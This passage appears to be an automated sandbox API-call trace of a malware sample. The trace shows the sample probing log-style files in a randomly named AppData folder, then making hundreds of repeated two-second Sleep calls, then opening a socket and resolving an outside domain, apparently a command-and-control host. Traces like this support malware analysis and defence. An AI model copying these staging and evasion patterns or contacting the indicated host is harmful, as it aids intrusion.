IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.238] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.238] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.238] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.238] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.239] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.239] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0186.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.239] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.239] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.239] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0186.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.239] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.239] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0186.239] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0186.239] Sleep (dwMilliseconds=0x7d0) [0186.240] Sleep (dwMilliseconds=0x7d0) [0186.242] Sleep (dwMilliseconds=0x7d0) [0186.243] Sleep (dwMilliseconds=0x7d0) [0186.245] Sleep (dwMilliseconds=0x7d0) [0186.246] Sleep (dwMilliseconds=0x7d0) [0186.248] Sleep (dwMilliseconds=0x7d0) [0186.249] Sleep (dwMilliseconds=0x7d0) [0186.251] Sleep (dwMilliseconds=0x7d0) [0186.252] Sleep (dwMilliseconds=0x7d0) [0186.254] Sleep (dwMilliseconds=0x7d0) [0186.255] Sleep (dwMilliseconds=0x7d0) [0186.257] Sleep (dwMilliseconds=0x7d0) [0186.259] Sleep (dwMilliseconds=0x7d0) [0186.261] Sleep (dwMilliseconds=0x7d0) [0186.262] Sleep (dwMilliseconds=0x7d0) [0186.264] Sleep (dwMilliseconds=0x7d0) [0186.265] Sleep (dwMilliseconds=0x7d0) [0186.267] Sleep (dwMilliseconds=0x7d0) [0186.268] Sleep (dwMilliseconds=0x7d0) [0186.270] Sleep (dwMilliseconds=0x7d0) [0186.271] Sleep (dwMilliseconds=0x7d0) [0186.273] Sleep (dwMilliseconds=0x7d0) [0186.274] Sleep (dwMilliseconds=0x7d0) [0186.276] Sleep (dwMilliseconds=0x7d0) [0186.277] Sleep (dwMilliseconds=0x7d0) [0186.279] Sleep (dwMilliseconds=0x7d0) [0186.280] Sleep (dwMilliseconds=0x7d0) [0186.282] Sleep (dwMilliseconds=0x7d0) [0186.283] Sleep (dwMilliseconds=0x7d0) [0186.285] Sleep (dwMilliseconds=0x7d0) [0186.301] Sleep (dwMilliseconds=0x7d0) [0186.302] Sleep (dwMilliseconds=0x7d0) [0186.303] Sleep (dwMilliseconds=0x7d0) [0186.305] Sleep (dwMilliseconds=0x7d0) [0186.307] Sleep (dwMilliseconds=0x7d0) [0186.308] Sleep (dwMilliseconds=0x7d0) [0186.310] Sleep (dwMilliseconds=0x7d0) [0186.311] Sleep (dwMilliseconds=0x7d0) [0186.313] Sleep (dwMilliseconds=0x7d0) [0186.314] Sleep (dwMilliseconds=0x7d0) [0186.316] Sleep (dwMilliseconds=0x7d0) [0186.317] Sleep (dwMilliseconds=0x7d0) [0186.322] Sleep (dwMilliseconds=0x7d0) [0186.324] Sleep (dwMilliseconds=0x7d0) [0186.326] Sleep (dwMilliseconds=0x7d0) [0186.328] Sleep (dwMilliseconds=0x7d0) [0186.329] Sleep (dwMilliseconds=0x7d0) [0186.331] Sleep (dwMilliseconds=0x7d0) [0186.332] Sleep (dwMilliseconds=0x7d0) [0186.333] Sleep (dwMilliseconds=0x7d0) [0186.335] Sleep (dwMilliseconds=0x7d0) [0186.336] Sleep (dwMilliseconds=0x7d0) [0186.338] Sleep (dwMilliseconds=0x7d0) [0186.340] Sleep (dwMilliseconds=0x7d0) [0186.341] Sleep (dwMilliseconds=0x7d0) [0186.343] Sleep (dwMilliseconds=0x7d0) [0186.344] Sleep (dwMilliseconds=0x7d0) [0186.345] Sleep (dwMilliseconds=0x7d0) [0186.347] Sleep (dwMilliseconds=0x7d0) [0186.348] Sleep (dwMilliseconds=0x7d0) [0186.350] Sleep (dwMilliseconds=0x7d0) [0186.351] Sleep (dwMilliseconds=0x7d0) [0186.353] Sleep (dwMilliseconds=0x7d0) [0186.355] Sleep (dwMilliseconds=0x7d0) [0186.356] Sleep (dwMilliseconds=0x7d0) [0186.358] Sleep (dwMilliseconds=0x7d0) [0186.359] Sleep (dwMilliseconds=0x7d0) [0186.360] Sleep (dwMilliseconds=0x7d0) [0186.362] Sleep (dwMilliseconds=0x7d0) [0186.363] Sleep (dwMilliseconds=0x7d0) [0186.365] Sleep (dwMilliseconds=0x7d0) [0186.366] Sleep (dwMilliseconds=0x7d0) [0186.368] Sleep (dwMilliseconds=0x7d0) [0186.370] Sleep (dwMilliseconds=0x7d0) [0186.371] Sleep (dwMilliseconds=0x7d0) [0186.373] Sleep (dwMilliseconds=0x7d0) [0186.374] Sleep (dwMilliseconds=0x7d0) [0186.376] Sleep (dwMilliseconds=0x7d0) [0186.377] Sleep (dwMilliseconds=0x7d0) [0186.379] Sleep (dwMilliseconds=0x7d0) [0186.380] Sleep (dwMilliseconds=0x7d0) [0186.381] Sleep (dwMilliseconds=0x7d0) [0186.383] Sleep (dwMilliseconds=0x7d0) [0186.385] Sleep (dwMilliseconds=0x7d0) [0186.386] Sleep (dwMilliseconds=0x7d0) [0186.388] Sleep (dwMilliseconds=0x7d0) [0186.390] Sleep (dwMilliseconds=0x7d0) [0186.391] Sleep (dwMilliseconds=0x7d0) [0186.393] Sleep (dwMilliseconds=0x7d0) [0186.395] Sleep (dwMilliseconds=0x7d0) [0186.396] Sleep (dwMilliseconds=0x7d0) [0186.397] Sleep (dwMilliseconds=0x7d0) [0186.399] Sleep (dwMilliseconds=0x7d0) [0186.401] Sleep (dwMilliseconds=0x7d0) [0186.402] Sleep (dwMilliseconds=0x7d0) [0186.404] Sleep (dwMilliseconds=0x7d0) [0186.405] Sleep (dwMilliseconds=0x7d0) [0186.406] Sleep (dwMilliseconds=0x7d0) [0186.408] Sleep (dwMilliseconds=0x7d0) [0186.409] Sleep (dwMilliseconds=0x7d0) [0186.411] Sleep (dwMilliseconds=0x7d0) [0186.413] Sleep (dwMilliseconds=0x7d0) [0186.414] Sleep (dwMilliseconds=0x7d0) [0186.416] Sleep (dwMilliseconds=0x7d0) [0186.417] Sleep (dwMilliseconds=0x7d0) [0186.418] Sleep (dwMilliseconds=0x7d0) [0186.420] Sleep (dwMilliseconds=0x7d0) [0186.423] Sleep (dwMilliseconds=0x7d0) [0186.428] Sleep (dwMilliseconds=0x7d0) [0186.429] Sleep (dwMilliseconds=0x7d0) [0186.430] Sleep (dwMilliseconds=0x7d0) [0186.432] Sleep (dwMilliseconds=0x7d0) [0186.433] Sleep (dwMilliseconds=0x7d0) [0186.435] Sleep (dwMilliseconds=0x7d0) [0186.436] Sleep (dwMilliseconds=0x7d0) [0186.438] Sleep (dwMilliseconds=0x7d0) [0186.439] Sleep (dwMilliseconds=0x7d0) [0186.441] Sleep (dwMilliseconds=0x7d0) [0186.442] Sleep (dwMilliseconds=0x7d0) [0186.444] Sleep (dwMilliseconds=0x7d0) [0186.445] Sleep (dwMilliseconds=0x7d0) [0186.447] Sleep (dwMilliseconds=0x7d0) [0186.448] Sleep (dwMilliseconds=0x7d0) [0186.450] Sleep (dwMilliseconds=0x7d0) [0186.451] Sleep (dwMilliseconds=0x7d0) [0186.453] Sleep (dwMilliseconds=0x7d0) [0186.454] Sleep (dwMilliseconds=0x7d0) [0186.456] Sleep (dwMilliseconds=0x7d0) [0186.457] Sleep (dwMilliseconds=0x7d0) [0186.459] Sleep (dwMilliseconds=0x7d0) [0186.460] Sleep (dwMilliseconds=0x7d0) [0186.462] Sleep (dwMilliseconds=0x7d0) [0186.463] Sleep (dwMilliseconds=0x7d0) [0186.465] Sleep (dwMilliseconds=0x7d0) [0186.466] Sleep (dwMilliseconds=0x7d0) [0186.468] Sleep (dwMilliseconds=0x7d0) [0186.469] Sleep (dwMilliseconds=0x7d0) [0186.471] Sleep (dwMilliseconds=0x7d0) [0186.472] Sleep (dwMilliseconds=0x7d0) [0186.474] Sleep (dwMilliseconds=0x7d0) [0186.475] Sleep (dwMilliseconds=0x7d0) [0186.477] Sleep (dwMilliseconds=0x7d0) [0186.478] Sleep (dwMilliseconds=0x7d0) [0186.480] Sleep (dwMilliseconds=0x7d0) [0186.481] Sleep (dwMilliseconds=0x7d0) [0186.483] Sleep (dwMilliseconds=0x7d0) [0186.484] Sleep (dwMilliseconds=0x7d0) [0186.486] Sleep (dwMilliseconds=0x7d0) [0186.487] Sleep (dwMilliseconds=0x7d0) [0186.489] Sleep (dwMilliseconds=0x7d0) [0186.490] Sleep (dwMilliseconds=0x7d0) [0186.492] Sleep (dwMilliseconds=0x7d0) [0186.493] Sleep (dwMilliseconds=0x7d0) [0186.495] Sleep (dwMilliseconds=0x7d0) [0186.496] Sleep (dwMilliseconds=0x7d0) [0186.498] Sleep (dwMilliseconds=0x7d0) [0186.499] Sleep (dwMilliseconds=0x7d0) [0186.501] Sleep (dwMilliseconds=0x7d0) [0186.502] Sleep (dwMilliseconds=0x7d0) [0186.504] Sleep (dwMilliseconds=0x7d0) [0186.505] Sleep (dwMilliseconds=0x7d0) [0186.507] Sleep (dwMilliseconds=0x7d0) [0186.508] Sleep (dwMilliseconds=0x7d0) [0186.510] Sleep (dwMilliseconds=0x7d0) [0186.511] Sleep (dwMilliseconds=0x7d0) [0186.513] Sleep (dwMilliseconds=0x7d0) [0186.514] Sleep (dwMilliseconds=0x7d0) [0186.516] Sleep (dwMilliseconds=0x7d0) [0186.517] Sleep (dwMilliseconds=0x7d0) [0186.519] Sleep (dwMilliseconds=0x7d0) [0186.520] Sleep (dwMilliseconds=0x7d0) [0186.523] Sleep (dwMilliseconds=0x7d0) [0186.524] Sleep (dwMilliseconds=0x7d0) [0186.526] Sleep (dwMilliseconds=0x7d0) [0186.527] Sleep (dwMilliseconds=0x7d0) [0186.529] Sleep (dwMilliseconds=0x7d0) [0186.530] Sleep (dwMilliseconds=0x7d0) [0186.532] Sleep (dwMilliseconds=0x7d0) [0186.533] Sleep (dwMilliseconds=0x7d0) [0186.648] Sleep (dwMilliseconds=0x7d0) [0186.916] Sleep (dwMilliseconds=0x7d0) [0186.917] Sleep (dwMilliseconds=0x7d0) [0186.919] Sleep (dwMilliseconds=0x7d0) [0186.920] Sleep (dwMilliseconds=0x7d0) [0186.922] Sleep (dwMilliseconds=0x7d0) [0186.923] Sleep (dwMilliseconds=0x7d0) [0186.925] Sleep (dwMilliseconds=0x7d0) [0186.926] Sleep (dwMilliseconds=0x7d0) [0186.928] Sleep (dwMilliseconds=0x7d0) [0186.929] Sleep (dwMilliseconds=0x7d0) [0186.931] Sleep (dwMilliseconds=0x7d0) [0186.932] Sleep (dwMilliseconds=0x7d0) [0186.934] Sleep (dwMilliseconds=0x7d0) [0186.935] Sleep (dwMilliseconds=0x7d0) [0186.937] Sleep (dwMilliseconds=0x7d0) [0186.938] Sleep (dwMilliseconds=0x7d0) [0186.940] Sleep (dwMilliseconds=0x7d0) [0186.941] Sleep (dwMilliseconds=0x7d0) [0186.943] Sleep (dwMilliseconds=0x7d0) [0186.944] Sleep (dwMilliseconds=0x7d0) [0186.946] Sleep (dwMilliseconds=0x7d0) [0186.947] Sleep (dwMilliseconds=0x7d0) [0186.950] Sleep (dwMilliseconds=0x7d0) [0186.951] Sleep (dwMilliseconds=0x7d0) [0186.953] Sleep (dwMilliseconds=0x7d0) [0186.954] Sleep (dwMilliseconds=0x7d0) [0186.956] Sleep (dwMilliseconds=0x7d0) [0186.957] Sleep (dwMilliseconds=0x7d0) [0186.959] Sleep (dwMilliseconds=0x7d0) [0186.960] Sleep (dwMilliseconds=0x7d0) [0186.962] Sleep (dwMilliseconds=0x7d0) [0186.963] Sleep (dwMilliseconds=0x7d0) [0186.965] Sleep (dwMilliseconds=0x7d0) [0186.966] Sleep (dwMilliseconds=0x7d0) [0186.968] Sleep (dwMilliseconds=0x7d0) [0186.969] Sleep (dwMilliseconds=0x7d0) [0186.971] Sleep (dwMilliseconds=0x7d0) [0186.972] Sleep (dwMilliseconds=0x7d0) [0186.974] Sleep (dwMilliseconds=0x7d0) [0186.975] Sleep (dwMilliseconds=0x7d0) [0186.977] Sleep (dwMilliseconds=0x7d0) [0186.978] Sleep (dwMilliseconds=0x7d0) [0186.980] Sleep (dwMilliseconds=0x7d0) [0186.981] Sleep (dwMilliseconds=0x7d0) [0186.986] Sleep (dwMilliseconds=0x7d0) [0186.989] Sleep (dwMilliseconds=0x7d0) [0186.992] Sleep (dwMilliseconds=0x7d0) [0186.994] Sleep (dwMilliseconds=0x7d0) [0186.998] Sleep (dwMilliseconds=0x7d0) [0187.001] Sleep (dwMilliseconds=0x7d0) [0187.002] Sleep (dwMilliseconds=0x7d0) [0187.003] Sleep (dwMilliseconds=0x7d0) [0187.005] Sleep (dwMilliseconds=0x7d0) [0187.006] Sleep (dwMilliseconds=0x7d0) [0187.008] Sleep (dwMilliseconds=0x7d0) [0187.009] Sleep (dwMilliseconds=0x7d0) [0187.011] Sleep (dwMilliseconds=0x7d0) [0187.012] Sleep (dwMilliseconds=0x7d0) [0187.014] Sleep (dwMilliseconds=0x7d0) [0187.015] Sleep (dwMilliseconds=0x7d0) [0187.017] Sleep (dwMilliseconds=0x7d0) [0187.018] Sleep (dwMilliseconds=0x7d0) [0187.020] Sleep (dwMilliseconds=0x7d0) [0187.021] Sleep (dwMilliseconds=0x7d0) [0187.023] Sleep (dwMilliseconds=0x7d0) [0187.024] Sleep (dwMilliseconds=0x7d0) [0187.026] Sleep (dwMilliseconds=0x7d0) [0187.027] Sleep (dwMilliseconds=0x7d0) [0187.029] Sleep (dwMilliseconds=0x7d0) [0187.030] Sleep (dwMilliseconds=0x7d0) [0187.032] Sleep (dwMilliseconds=0x7d0) [0187.033] Sleep (dwMilliseconds=0x7d0) [0187.035] Sleep (dwMilliseconds=0x7d0) [0187.036] Sleep (dwMilliseconds=0x7d0) [0187.038] Sleep (dwMilliseconds=0x7d0) [0187.039] Sleep (dwMilliseconds=0x7d0) [0187.041] Sleep (dwMilliseconds=0x7d0) [0187.042] Sleep (dwMilliseconds=0x7d0) [0187.044] Sleep (dwMilliseconds=0x7d0) [0187.045] Sleep (dwMilliseconds=0x7d0) [0187.047] Sleep (dwMilliseconds=0x7d0) [0187.091] Sleep (dwMilliseconds=0x7d0) [0187.093] Sleep (dwMilliseconds=0x7d0) [0187.094] Sleep (dwMilliseconds=0x7d0) [0187.096] Sleep (dwMilliseconds=0x7d0) [0187.098] Sleep (dwMilliseconds=0x7d0) [0187.099] Sleep (dwMilliseconds=0x7d0) [0187.101] Sleep (dwMilliseconds=0x7d0) [0187.102] Sleep (dwMilliseconds=0x7d0) [0187.104] Sleep (dwMilliseconds=0x7d0) [0187.105] Sleep (dwMilliseconds=0x7d0) [0187.107] Sleep (dwMilliseconds=0x7d0) [0187.108] Sleep (dwMilliseconds=0x7d0) [0187.111] Sleep (dwMilliseconds=0x7d0) [0187.114] Sleep (dwMilliseconds=0x7d0) [0187.116] Sleep (dwMilliseconds=0x7d0) [0187.119] Sleep (dwMilliseconds=0x7d0) [0187.121] Sleep (dwMilliseconds=0x7d0) [0187.122] Sleep (dwMilliseconds=0x7d0) [0187.124] Sleep (dwMilliseconds=0x7d0) [0187.125] Sleep (dwMilliseconds=0x7d0) [0187.127] Sleep (dwMilliseconds=0x7d0) [0187.128] Sleep (dwMilliseconds=0x7d0) [0187.130] Sleep (dwMilliseconds=0x7d0) [0187.131] Sleep (dwMilliseconds=0x7d0) [0187.133] Sleep (dwMilliseconds=0x7d0) [0187.134] Sleep (dwMilliseconds=0x7d0) [0187.136] Sleep (dwMilliseconds=0x7d0) [0187.137] Sleep (dwMilliseconds=0x7d0) [0187.139] Sleep (dwMilliseconds=0x7d0) [0187.140] Sleep (dwMilliseconds=0x7d0) [0187.142] Sleep (dwMilliseconds=0x7d0) [0187.143] Sleep (dwMilliseconds=0x7d0) [0187.145] Sleep (dwMilliseconds=0x7d0) [0187.146] Sleep (dwMilliseconds=0x7d0) [0187.148] Sleep (dwMilliseconds=0x7d0) [0187.149] Sleep (dwMilliseconds=0x7d0) [0187.151] Sleep (dwMilliseconds=0x7d0) [0187.152] Sleep (dwMilliseconds=0x7d0) [0187.154] Sleep (dwMilliseconds=0x7d0) [0187.155] Sleep (dwMilliseconds=0x7d0) [0187.157] Sleep (dwMilliseconds=0x7d0) [0187.159] Sleep (dwMilliseconds=0x7d0) [0187.160] Sleep (dwMilliseconds=0x7d0) [0187.162] Sleep (dwMilliseconds=0x7d0) [0187.163] Sleep (dwMilliseconds=0x7d0) [0187.165] Sleep (dwMilliseconds=0x7d0) [0187.166] Sleep (dwMilliseconds=0x7d0) [0187.168] Sleep (dwMilliseconds=0x7d0) [0187.169] Sleep (dwMilliseconds=0x7d0) [0187.171] Sleep (dwMilliseconds=0x7d0) [0187.172] Sleep (dwMilliseconds=0x7d0) [0187.174] Sleep (dwMilliseconds=0x7d0) [0187.175] Sleep (dwMilliseconds=0x7d0) [0187.177] Sleep (dwMilliseconds=0x7d0) [0187.178] Sleep (dwMilliseconds=0x7d0) [0187.180] Sleep (dwMilliseconds=0x7d0) [0187.181] Sleep (dwMilliseconds=0x7d0) [0187.183] Sleep (dwMilliseconds=0x7d0) [0187.184] Sleep (dwMilliseconds=0x7d0) [0187.186] Sleep (dwMilliseconds=0x7d0) [0187.187] Sleep (dwMilliseconds=0x7d0) [0187.189] Sleep (dwMilliseconds=0x7d0) [0187.190] Sleep (dwMilliseconds=0x7d0) [0187.192] Sleep (dwMilliseconds=0x7d0) [0187.193] Sleep (dwMilliseconds=0x7d0) [0187.195] Sleep (dwMilliseconds=0x7d0) [0187.196] Sleep (dwMilliseconds=0x7d0) [0187.198] Sleep (dwMilliseconds=0x7d0) [0187.199] Sleep (dwMilliseconds=0x7d0) [0187.201] Sleep (dwMilliseconds=0x7d0) [0187.202] Sleep (dwMilliseconds=0x7d0) [0187.204] Sleep (dwMilliseconds=0x7d0) [0187.205] Sleep (dwMilliseconds=0x7d0) [0187.207] Sleep (dwMilliseconds=0x7d0) [0187.208] Sleep (dwMilliseconds=0x7d0) [0187.210] Sleep (dwMilliseconds=0x7d0) [0187.211] Sleep (dwMilliseconds=0x7d0) [0187.214] Sleep (dwMilliseconds=0x7d0) [0187.216] Sleep (dwMilliseconds=0x7d0) [0187.217] Sleep (dwMilliseconds=0x7d0) [0187.219] Sleep (dwMilliseconds=0x7d0) [0187.220] Sleep (dwMilliseconds=0x7d0) [0187.222] Sleep (dwMilliseconds=0x7d0) [0187.223] Sleep (dwMilliseconds=0x7d0) [0187.225] Sleep (dwMilliseconds=0x7d0) [0187.226] Sleep (dwMilliseconds=0x7d0) [0187.228] Sleep (dwMilliseconds=0x7d0) [0187.229] Sleep (dwMilliseconds=0x7d0) [0187.230] Sleep (dwMilliseconds=0x7d0) [0187.232] Sleep (dwMilliseconds=0x7d0) [0187.233] Sleep (dwMilliseconds=0x7d0) [0187.235] Sleep (dwMilliseconds=0x7d0) [0187.236] Sleep (dwMilliseconds=0x7d0) [0187.238] Sleep (dwMilliseconds=0x7d0) [0187.239] Sleep (dwMilliseconds=0x7d0) [0187.241] Sleep (dwMilliseconds=0x7d0) [0187.242] Sleep (dwMilliseconds=0x7d0) [0187.244] Sleep (dwMilliseconds=0x7d0) [0187.245] Sleep (dwMilliseconds=0x7d0) [0187.247] Sleep (dwMilliseconds=0x7d0) [0187.248] Sleep (dwMilliseconds=0x7d0) [0187.250] Sleep (dwMilliseconds=0x7d0) [0187.251] Sleep (dwMilliseconds=0x7d0) [0187.253] Sleep (dwMilliseconds=0x7d0) [0187.254] Sleep (dwMilliseconds=0x7d0) [0187.256] Sleep (dwMilliseconds=0x7d0) [0187.258] Sleep (dwMilliseconds=0x7d0) [0187.260] Sleep (dwMilliseconds=0x7d0) [0187.261] Sleep (dwMilliseconds=0x7d0) [0187.263] Sleep (dwMilliseconds=0x7d0) [0187.264] Sleep (dwMilliseconds=0x7d0) [0187.266] Sleep (dwMilliseconds=0x7d0) [0187.267] Sleep (dwMilliseconds=0x7d0) [0187.269] Sleep (dwMilliseconds=0x7d0) [0187.270] Sleep (dwMilliseconds=0x7d0) [0187.272] Sleep (dwMilliseconds=0x7d0) [0187.273] Sleep (dwMilliseconds=0x7d0) [0187.275] Sleep (dwMilliseconds=0x7d0) [0187.276] Sleep (dwMilliseconds=0x7d0) [0187.278] Sleep (dwMilliseconds=0x7d0) [0187.279] Sleep (dwMilliseconds=0x7d0) [0187.281] Sleep (dwMilliseconds=0x7d0) [0187.282] Sleep (dwMilliseconds=0x7d0) [0187.284] Sleep (dwMilliseconds=0x7d0) [0187.285] Sleep (dwMilliseconds=0x7d0) [0187.287] Sleep (dwMilliseconds=0x7d0) [0187.288] Sleep (dwMilliseconds=0x7d0) [0187.290] Sleep (dwMilliseconds=0x7d0) [0187.291] Sleep (dwMilliseconds=0x7d0) [0187.293] Sleep (dwMilliseconds=0x7d0) [0187.294] Sleep (dwMilliseconds=0x7d0) [0187.296] Sleep (dwMilliseconds=0x7d0) [0187.297] Sleep (dwMilliseconds=0x7d0) [0187.299] Sleep (dwMilliseconds=0x7d0) [0187.300] Sleep (dwMilliseconds=0x7d0) [0187.302] Sleep (dwMilliseconds=0x7d0) [0187.303] Sleep (dwMilliseconds=0x7d0) [0187.305] Sleep (dwMilliseconds=0x7d0) [0187.306] Sleep (dwMilliseconds=0x7d0) [0187.308] Sleep (dwMilliseconds=0x7d0) [0187.309] Sleep (dwMilliseconds=0x7d0) [0187.311] Sleep (dwMilliseconds=0x7d0) [0187.312] Sleep (dwMilliseconds=0x7d0) [0187.314] Sleep (dwMilliseconds=0x7d0) [0187.315] Sleep (dwMilliseconds=0x7d0) [0187.317] Sleep (dwMilliseconds=0x7d0) [0187.318] Sleep (dwMilliseconds=0x7d0) [0187.320] Sleep (dwMilliseconds=0x7d0) [0187.322] Sleep (dwMilliseconds=0x7d0) [0187.323] Sleep (dwMilliseconds=0x7d0) [0187.324] Sleep (dwMilliseconds=0x7d0) [0187.326] Sleep (dwMilliseconds=0x7d0) [0187.327] Sleep (dwMilliseconds=0x7d0) [0187.329] Sleep (dwMilliseconds=0x7d0) [0187.330] Sleep (dwMilliseconds=0x7d0) [0187.332] Sleep (dwMilliseconds=0x7d0) [0187.333] Sleep (dwMilliseconds=0x7d0) [0187.335] Sleep (dwMilliseconds=0x7d0) [0187.336] Sleep (dwMilliseconds=0x7d0) [0187.338] Sleep (dwMilliseconds=0x7d0) [0187.339] Sleep (dwMilliseconds=0x7d0) [0187.341] Sleep (dwMilliseconds=0x7d0) [0187.342] Sleep (dwMilliseconds=0x7d0) [0187.345] Sleep (dwMilliseconds=0x7d0) [0187.346] Sleep (dwMilliseconds=0x7d0) [0187.348] Sleep (dwMilliseconds=0x7d0) [0187.349] Sleep (dwMilliseconds=0x7d0) [0187.351] Sleep (dwMilliseconds=0x7d0) [0187.352] Sleep (dwMilliseconds=0x7d0) [0187.354] Sleep (dwMilliseconds=0x7d0) [0187.355] Sleep (dwMilliseconds=0x7d0) [0187.358] Sleep (dwMilliseconds=0x7d0) [0187.360] Sleep (dwMilliseconds=0x7d0) [0187.361] Sleep (dwMilliseconds=0x7d0) [0187.362] Sleep (dwMilliseconds=0x7d0) [0187.364] Sleep (dwMilliseconds=0x7d0) [0187.365] Sleep (dwMilliseconds=0x7d0) [0187.367] Sleep (dwMilliseconds=0x7d0) [0187.368] socket (af=2, type=1, protocol=6) returned 0x25d0 [0187.368] getaddrinfo (in: pNodeName="www.largestjerseysstore.com", pServiceName="80", pHints=0x87922d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8792308 | out: ppResult=0x8792308*=0x862df80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, 